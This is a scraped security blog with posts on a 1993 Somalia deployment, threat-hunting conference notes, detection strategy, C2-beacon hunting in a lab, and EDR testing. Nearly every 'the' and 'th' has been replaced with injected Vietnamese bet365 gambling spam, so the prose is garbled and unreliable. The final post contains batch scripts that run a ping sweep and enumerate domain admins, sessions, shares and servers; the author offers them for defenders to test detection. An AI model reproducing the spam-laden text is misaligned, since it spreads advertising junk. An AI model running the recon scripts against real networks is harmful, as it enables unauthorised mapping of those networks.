Wednesday, October 3, 2018

This Day 25 Years Ago

This is definitely a different post for me, but today marks 25 years since Operation Gothic Serpent, or what has become known as Blackhawk Down.  This also marks a significant point in my life and one that will remain my thoughts daily for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next 25 years.  I was in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 24th Infantry Division and my company had just assumed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 role of immediate ready company and my platoon was immediate ready platoon (kind of an on call status for IT, but has cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 possibility to become much much more intense).  As part of this immediate ready platoon, we were tasked with being anywhere in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world within 18 hours if needed.  To my knowledge, that day was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first time a mechanized infantry platoon was deployed with that kind of speed.  They always say it helps to talk about things, so I would like to talk about that day from my point of view.  

My first memory of that day was around 2AM.  I remember being woken up by my beeper and thinking it was a training alert (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re were no cell phones back cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n 😃).  We had just returned from spending 4 weeks in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 field and my assumption was a test.  Leadership was testing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir ability to contact everyone.  I figured a simple phone call and I would be back in bed.  I made cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 phone call and was informed that I needed to be in formation in 30 minutes.  A little upset that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were taking it this far, I got dressed, kissed my wife of 6 months goodby, and told her I would be back soon. 

When I arrived at work I saw cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 look on people’s faces.  Serious, scared, anxious.  These weren’t cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 faces I’ve seen during routine alerts.  I began hearing of CNN’s reporting on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 events happening in Mogadishu.  This was quickly turning into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 day I totally wasn’t expecting.  Shortly after I had arrived we were told we needed to draw weapons before formation.  I remember that pit in my stomach, knowing where I was heading and knowing that I would be leaving my wife, who had only lived in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 area for 5 weeks, behind.  I hadn’t said goodby to her and prayed that I would be able to at some point before we left.

During formation it was confirmed that we were being deployed to Somalia.  3rd PLT 3/15 INF (which was my platoon) would be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 immediate ready platoon and were to head over to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 gym where we would receive our shots, have wills drawn up or any ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r legal needs.  If you haven’t experienced cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vaccine process, it’s like an assembly line.  Going from station to station until you eventually reach cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end.

The next few hours are kind of vague.  I believe a lot of it was hurry up and wait, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were probably dealing with some logistical issues.  At any rate, my squad leader allowed me to go home for a few minutes so I could let my wife know what was going on.  While I was at home I was also able to call my parents and let cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m know too.  I really appreciated that I was able see her and talk to her.  Soon I had to head back though.  I knew cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 busses would be arriving that would take us to Hunter Army Airfield where our gear and vehicles were prestaged.  The hardest thing in my life was saying good by.  Scared for her because she would be alone in a place she didn’t know.  Wondering if I would ever see her again and knowing she was thinking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same thing.  Finally turning and walking away was absolutely heart wrenching for me.

Soon cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 busses did show up.  We all boarded and made cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way from Ft. Stewart to Savannah.  I watched cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cars out of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 window and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 people walking around.  I thought about how different our lives were at that point in time.  They were headed to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 park and I had no idea what I was heading to.  They could plan cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rest of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir day and I wasn’t sure what I could plan.  It was ok though.  I had been in Desert Storm and knew that it could happen at any time again.  There would have been no way that I would not have gone.  That’s not what we do.  Arriving at Hunter Army Airfield I saw cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 2 C5 Galaxies that would take us on our journey.  The Bradleys hadn’t been loaded yet, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y soon would be and we would be on our way.

From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 busses we moved to some underground barracks where we were distributed ammo.  Once our magazines were loaded we moved to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 range where we had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to zero our weapons.  This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 one time you want to make sure it’s dead on (pun intended).

Soon we were able to board cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 plane.  If you’ve never been in one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se, it’s hard to explain how big cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are.  The seating is above cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cargo area and holds about 40 people.  There is one window seat and everyone faces backwards.  I was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lucky one and had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 window seat. It kept me occupied during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trip, even if I was only looking at water much of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time.  I couldn’t sleep and it was good to have something to do.  As we got closer we had people go down to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cargo area where 2 of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 4 Bradleys were.  They loaded cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 25mm chain gun as well as missiles into to launcher.  I don’t believe anyone knew what to expect when we landed and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 nose of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 plane opened up.  I can tell you that nobody wanted to be caught off guard though.

The flight was many many hours.  As we got closer to landing you could see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 focus of people change.  It went from talking and joking around to determination and anticipation.  It was time to do cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 job we were sent to do.  Whatever that may turn out to be.  I would spend cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next 5 months in Somalia.  


My experience that day is different than many because I deployed in response to those events.  Please remember those that were cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re and gave everything cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y had for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir brocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs.

This picture was taken late Oct '93 just outside what would become Victory Base.  Was home for a few weeks for my platoon.


Saturday, September 8, 2018

Thoughts After cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Sans 2018 ThreatHunting Summit

Over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 past few days I've had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pleasure of attending cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Sans ThreatHunting Summit.  I thought, not only was this a terrific event, but also gave me cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to see how ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs in our community are tackling problems that we all are dealing with.  I was able to look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things I am doing and see if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are ways that I can improve or things that I can incorporate into my current processes.  The summit speakers and attendees also helped me spark new ideas as well as things I would like to dig into more.

One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 thoughts I had during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 summit was when Alex Pinto (@alexcpsec) and Rob Lee (@RobertMLee) were discussing machine learning.  I believe ML may be hard to implement into a detection strategy, unless it’s for a very narrow and specific use case.  As cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scope widens, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accuracy of your results may suffer.  What would happen though if we start building models based on a wider scope, but built cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m in a way that would cluster with ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r models?  Would we be able to cluster cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 results of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se different models in a way may cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n highlight an attacker performing different actions during an intrusion.  I’m spit balling here, but as an example: 
  1. A model looking at all flow data for anomalous network patterns between machines.
  2. A model that is looking for anomalous aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ntication patterns.  
Can cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 results of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se 2 models cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n be clustered by src ip or dest ip (or some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r attribute) and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cluster would be a higher fidelity event than cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 results of each individual model?  I’m not sure as I don’t have a lot of experience with ML, so just throwing that out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re.

Rick McElroy (@InfoSecRick) was also talking about something similar during his keynote.  Analysts need context when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are looking at events as it’s often very hard to classify something as malicious until you have aditional supporting evidence (I summarized).  I believe we can often build multiple points of context into our our alerting though.  By building visibility around triggers (actions), regardless of how noisy cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y may be individually, we can cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n generate alerts where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are multiple data points and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore produce higher fidelity alerts while reducing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 overall number.  An example may be: 
  1. Powershell initiating a http request.
  2. First seen non alpha-numeric character pattern.
  3. Multiple flags where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 flag is 3 characters or less
By being able to generate an alert on any of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 3 characteristics, but not doing so until I have met a threshold of 2 or more, I have dramatically increased cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fidelity of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 alert.  Or we could generate a suspicious powershell event based on any 1 of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 3 occurring and send an alert when and additional suspicious action on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 host has been identified within a certain time frame.  An executable being written to a Temp directory may be an example (or any ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r detection you may have that will map to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 host).  The cool thing about this is that you can start to dynamically see behaviors vs singular events.

ATT&CK was discussed quite a bit throughout cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 summit (@likecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365coins and @its_a_feature_).  This is such a cool framework.  Analysts can wrap cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir heads around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y can (and should) be hunting for.  I’m curious how many companies have adopted this framework and are using it to build and validate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir detection.  If you start building cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 visibility around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 types of things listed in ATT&CK, can you cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n start clustering events generated and map cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 framework?  The more data points that map, does that raise cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 confidence of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 behavior, machine in question or user associated with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 events?


My flight was delayed today, so I’ve been sitting at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 airport for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last several hours.  This is a quick post, but I wanted to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se thoughts jotted down while I had some time. 

Saturday, June 30, 2018

Methods of Detection

I talk a lot about how I may go about finding adversary behavior, but I have not spoken very much about how teams may be alerted.  This is a much needed conversation in my opinion.  As teams gain capability and visibility, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir alert volumes will likely increase too.  The obvious example may be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 team that implemented a threat feed and wants to incorporate a watchlist that is largely derived from this.  Sure, you will probably receive alerts from this and management will be happy that you are finally doing "Intel driven detection" ;) , but how will your analysts work cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se without cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 proper context as to why that indicator may be bad?

I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are 3 different forms of detection.  Using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se correctly can:

1. Decrease analyst fatigue.
2. Decrease false positive rate.
3. Decrease alert volume.
3. Gain additional visibility.
4. Gain additional alerting capability.


Detections that are fed directly to an analyst as an alert. 
      
These detections are generally high fidelity and are well documented.  Available to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 analyst are descriptions of what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intention of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 detection rules are along with true positive and false positive examples. 

Detections that are used for correlation.

These detections are generally low fidelity.  They may happen often in our environments as normal activity, but when combining multiple detections and looking at order / timing, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y may indicate malicious actions being taken by an attacker.  I also believe that all detections that go directly to analysts should go in this bucket as well.  You never know when looking at clusters of detections can change how an alert is categorized.

The downside of alerting from dynamically correlated events is that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y may be more difficult to analyze.  You may often be looking for behaviors and those analysts with limited experience may miss key indicators that point to malicious behavior.  If tuned correctly cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 alert volume should be low so it may be possible to route all alerts derived from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se to more senior analysts.

Detections written to increase visibility.

These detections are used to increase our ability to perform direct alerting as well as correlation.  An example may be that we want to know when a Windows command prompt is spawned across a smb session.  We can use an IDS such as snort to gain this visibility.  We can cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n feed that into our correlation bucket or directly to an analyst depending on fidelity.  This is just one example, think about ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r technologies your org has that would allow you to write rules and gain additional capability (HIPS, HIDS, Proxy, Sysmon..).

So now if we take our initial example of alerting directly off a newly purchased threat feed, we may see (based on alert volume and fidelity) that a better option could be to use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se detections in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 correlation bucket.  An example could cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n be Watchlist alert + Rare User-Agent + URI Volume.  Alone cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se detections may fire 1000's of times a day, but togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y may mean a newly discovered compromise.

Thursday, March 29, 2018

C2 Hunting

For an adversary to be successful in your environment cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y will need a way to enter and leave your network.  This can obviously happen in many different ways.  One way may be an attacker utilizing 3rd party access, anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r possibly gaining access through an externally facing device, but more often than not, this is facilitated by a backdoor being placed on a machine within your network, or at least cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 initial stages are.  Going with this assumption, it cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n makes sense that we spend a large amount of time and effort trying to identify indications of backdoors.

So when you sit down and think about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem, ask yourself, what does a backdoor look like.  What does it look like when it’s initially placed on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 machine?  What does it look like when it starts?  What does it look like when it beacons?  What does it look like when it’s actively being used?  For this post I will be focusing on beacon behaviors, but  remember that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r opportunities to hunt for and identify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se.

When we investigate IDS alerts that are related to C2 activity, what are some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 indications that we look for that may help tip cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scale in saying that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 alert is a true positive.  Or to put it anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r way, what are some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that may be common about C2?

  • User-Agent is rare
  • User-Agent is new
  • Domain is rare
  • Domain is new
  • High frequency of http connections
  • URI is same
  • URI varies but length is constant
  • Domain varies but length is constant
  • Missing referrer
  • Missing or same referrer to multiple uri’s on single dest.

All of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 above will not be true about every beacon, but in a far majority of instances, more than one statement will be true.  If I look for multiples of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 above, by source and destination pairs, I believe that I will have a higher chance of identifying malicious beacon traffic than by analyzing each individually.

Next we need to generate some traffic so that we can validate our cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ories.  If you are wondering about a list of backdoors that would be good to test, have a look at attack.mitre.org and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 backdoors that have been used by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 various actors that are tracked.  I also can’t emphasize enough cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 importance of having an environment that you can use for testing out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ories.  Being able to perform and log cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actions that you want to find can often lead to new ideas when you see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual data that is generated.  You also need to know that your queries will really find what you are looking for.  For this testing I setup 3 vm’s which are listed below.

Machine 1 
  • Ubuntu 16.04
  • InetSim
  • Bro
  • Splunkforwarder

Machine 2
  • Ubuntu 16.04
  • Free Splunk

Machine 3
  • Windows 7
  • Default route and DNS is set to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IP address of Machine 1.

Flow
  • Obviously cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware will be executed on Machine 3.  For backdoors that communicate with a domain based C2, a DNS lookup will occur and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dns name will resolve to Machine 1.  For IP based C2, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic will follow cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default route on Machine 3 and Machine 1 will respond (using an iptables redirect and nat rule).
  • InetSim will respond to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 C2 communication.
  • Bro will log cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 http traffic and forward logs to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spunk server.
  • Scheduled queries will run within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Splunk environment to identify C2 behaviors that we define.
  • Results of queries will be logged to separate index within Splunk.
  • Scheduled search will run against this new index in an attempt to identify multiple behaviors on eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r a host or destination.


I used cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file for this blog post from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link below.  It’s named Cobaltstrike.exe, but I don’t believe it’s a Cobaltstrike backdoor.  I believe it serves cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 purpose for this post though.  How can we go about finding unknown backdoors, or backdoors that we don’t have signatures for.


https://www.hybrid-analysis.com/sample/5b16d3c8451a1ea7633aae14c28f30c2d5c9b925d9f607938828bf543db9c582?environmentId=100

The result of executing this particular backdoor can be seen in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 screenshot of correlated events below.  To get a better understanding of how this correlation occurred I'll go over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 queries that got us here.




When an http based backdoor communicates, it will reach out to a URI.  The URI or cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 URI structure is typically coded into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 backdoor.  If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 backdoor beacons to multiple URI's on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same C2 host, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se URI's are very often cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same character length.  This query looks for source/destination pairs with greater than 6 connections to multiple UR's of which all are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same length.


Just as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 URI or URI structure is often coded into a backdoor, a User-Agent string is as well.  These User-Agents are very often unique due to misspellings, version mismatches or simply random naming.  By stacking User-Agents you will find rare ones, but very often, after investigating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y will wind up being legitimate traffic.  By combining rare UA's with additional C2 behavior you can quickly focus on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 connections you should be looking at.  This query looks for less than 10 source hosts, all using a single UA, communicating to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same destination.


When you want to identify how a host wound up visiting a specific URL you would typically look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 referrer field.  Very often cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 referrer is left blank with C2 traffic or can be hardcoded with a single referrer for every beacon.  It can be odd to see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same referrer field to multiple URI's, all on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same destination host.  This query identifies a single referrer listed for multiple URI's on a single destination.


This query simply looks at volume of traffic between a source and a destination.  When combined with additional behaviors, this can be a good indicator of malicious traffic.


There are many additional signs of malicious beacon traffic.  By spending time identifying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se behaviors and incorporating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m into some type of detection workflow, your chances of spotting malicious over benign becomes much greater.  By applying this methodology you gain additional coverage over signature based detection or new capability where you currently don't have detection, but have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data (i.e. proxy logs). 

All questions and comments are welcome.  Feel free to reach out on twitter @jackcr.



Friday, January 12, 2018

What are your tools detecting

At some point during an intrusion, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker has gained enough access, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 need for malware will go away.  External access to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target network can be achieved through a vpn, 3rd party connection or simple misconfiguration on an external facing device.  Lateral movement, data consolidation and staging can all happen using builtin windows tools.  Data packaging can happen with builtin tools or public archiving utilities that are most likely used, legitimately, throughout your network by multiple users.  If an attacker has achieved this level of access, it is at this point you really need to ask yourself if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tools you have in place are capable of alerting you as to what may be happening.

From an EDR perspective, how much do you feel cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor should be detecting and alerting?  What types of data do you feel an EDR solution should be collecting?  How important is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interface and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 query language?  All of this is especially important if you don’t have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capability to author your own signatures or cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interface is so poorly designed that it is not feasible to generate your own alerts based on limitations imposed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor.

I put togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r some tests that you can use to verify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities of your tools when it comes to recon, lateral movement and data staging.  I would be very curious to know what your outcomes are and if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are any obvious gaps in coverage across vendors.  I think it would be pretty enlightening to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entire community.

This is also not meant to put down cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 work that vendors are doing in this area.  It has come a long way, but I think often we get focused on finding “cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware” when that is only one aspect.

Note: Change cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 below scripts and commands to match your environment.

========== a.bat ===========
@echo off
ping -n 1 192.168.1.3>>c:\temp\a.txt
ping -n 1 192.168.1.4>>c:\temp\a.txt
ping -n 1 192.168.1.5>>c:\temp\a.txt
ping -n 1 192.168.1.6>>c:\temp\a.txt
ping -n 1 192.168.1.7>>c:\temp\a.txt
ping -n 1 192.168.1.8>>c:\temp\a.txt
ping -n 1 192.168.1.9>>c:\temp\a.txt
ping -n 1 192.168.1.10>>c:\temp\a.txt
ping -n 1 192.168.1.11>>c:\temp\a.txt
ping -n 1 192.168.1.12>>c:\temp\a.txt
ping -n 1 192.168.1.13>>c:\temp\a.txt
ping -n 1 192.168.1.14>>c:\temp\a.txt
ping -n 1 192.168.1.15>>c:\temp\a.txt
ping -n 1 192.168.1.16>>c:\temp\a.txt
ping -n 1 192.168.1.17>>c:\temp\a.txt
ping -n 1 192.168.1.18>>c:\temp\a.txt
ping -n 1 192.168.1.19>>c:\temp\a.txt
ping -n 1 192.168.1.20>>c:\temp\a.txt
ping -n 1 192.168.1.21>>c:\temp\a.txt
ping -n 1 192.168.1.22>>c:\temp\a.txt
ping -n 1 192.168.1.23>>c:\temp\a.txt
ping -n 1 192.168.1.24>>c:\temp\a.txt
ping -n 1 192.168.1.25>>c:\temp\a.txt
ping -n 1 192.168.1.26>>c:\temp\a.txt
ping -n 1 192.168.1.27>>c:\temp\a.txt
ping -n 1 192.168.1.28>>c:\temp\a.txt
 
=========== Execute a.bat ========
cmd /c a.bat
 
========== b.bat ===========
@echo off
net localgroup administrators >>c:\windows\system32\b.txt
quser >>c:\windows\system32\b.txt
netstat -nab -p tcp >>c:\windows\system32\b.txt
net start >>c:\windows\system32\b.txt
net session >>c:\windows\system32\b.txt
net share >>c:\windows\system32\b.txt
net use >>c:\windows\system32\b.txt
net view >>c:\windows\system32\b.txt
net view /domain >>c:\windows\system32\b.txt
net time /domain >>c:\windows\system32\b.txt
ipconfig /all >>c:\windows\system32\b.txt
route print >>c:\windows\system32\b.txt
systeminfo >>c:\windows\system32\b.txt
dsquery server >>c:\windows\system32\b.txt
dsquery subnet -limit 10000 >>c:\windows\system32\b.txt
net group "domain admins" /domain >>c:\windows\system32\b.txt
